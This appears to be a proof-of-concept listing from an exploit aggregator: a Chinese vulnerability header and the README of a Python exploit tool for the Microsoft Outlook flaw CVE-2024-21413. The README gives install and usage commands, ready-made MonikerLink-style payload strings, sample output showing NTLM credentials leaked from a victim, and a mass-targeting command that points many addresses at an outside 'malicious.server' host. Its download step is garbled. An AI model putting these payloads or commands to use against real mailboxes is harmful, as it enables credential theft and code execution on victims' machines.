POC详情: 25291b87aa67153d9234b868a5147efb82a6101f

标题: Microsoft Outlook 安全漏洞 (CVE-2024-21413)
描述:Microsoft Outlook是美国微软(Microsoft)公司的一套电子邮件应用程序。 Microsoft Outlook 存在安全漏洞。以下产品和版本受到影响:Microsoft Office 2019 for 32-bit editions,Microsoft Office 2019 for 64-bit editions,Microsoft 365 Apps for Enterprise for 32-bit Systems,Microsoft 365 Apps for Enterprise
# 🛠️ CVE-2024-21413 Exploit

## 🌟 Description

This script is a powerful exploitation tool for the CVE-2024-21413 vulnerability found in Microsoft Outlook. The vulnerability allows attackers to bypass Protected View and execute malicious code by embedding specially crafted links in emails.

## ⚙️ Installation

To set up the exploitation tool, follow these steps:

1. **Download the repository**:

|:--------------- |

2. **Navigate to the tool's directory**:

cd CVE-2024-21413

3. **Install the required Python packages**:

pip install -r requirements.txt

## 🚀 Usage

To use the tool, run the script from the command line as follows:

python exploit.py [options]

### Options

- **-u, --url**:
  Specify the target Outlook email or server.

- **-f, --file**:
  Specify a file containing multiple email addresses to target.

- **-p, --payload**:
  Define a malicious file or link to inject.

- **-o, --output**:
  Define an output file to save logs and results.

When a single target is provided with the `-u` option and the system is vulnerable, the script will attempt to exploit the vulnerability by crafting a malicious email containing an embedded file link using the bypass method.

### Example

$ python3 exploit.py -u victim@domain.com -p "file:///\\\test\test.rtf!exploit"
[+] Payload successfully sent.
[!] victim@domain.com is vulnerable to CVE-2024-21413: NTLM credentials leaked.
[+] Exploit completed.

## 📊 Mass Targeting

For mass exploitation, use the `-f` option with a file containing multiple email addresses. The tool will attempt to send a crafted email to each target.

python exploit.py -f targets.txt -p "file:///\\malicious.server\payload.rtf!exploit"

## 🗒️ Affected Versions

The vulnerability affects the following Microsoft Office products:

- Microsoft Office LTSC 2021
- Microsoft 365 Apps for Enterprise
- Microsoft Outlook 2016
- Microsoft Office 2019

Successful exploitation can result in NTLM credential theft and arbitrary code execution.

## 🛡️ Disclaimer

Use this tool responsibly and ethically. Exploiting systems without authorization is illegal. Always obtain proper authorization before testing any system for vulnerabilities.

## 👏 Acknowledgments

Special thanks to Check Point researchers for discovering this vulnerability and providing insights into its exploitation method.

[4.0K] /data/pocs/25291b87aa67153d9234b868a5147efb82a6101f └── [2.4K] README.md 0 directories, 1 file
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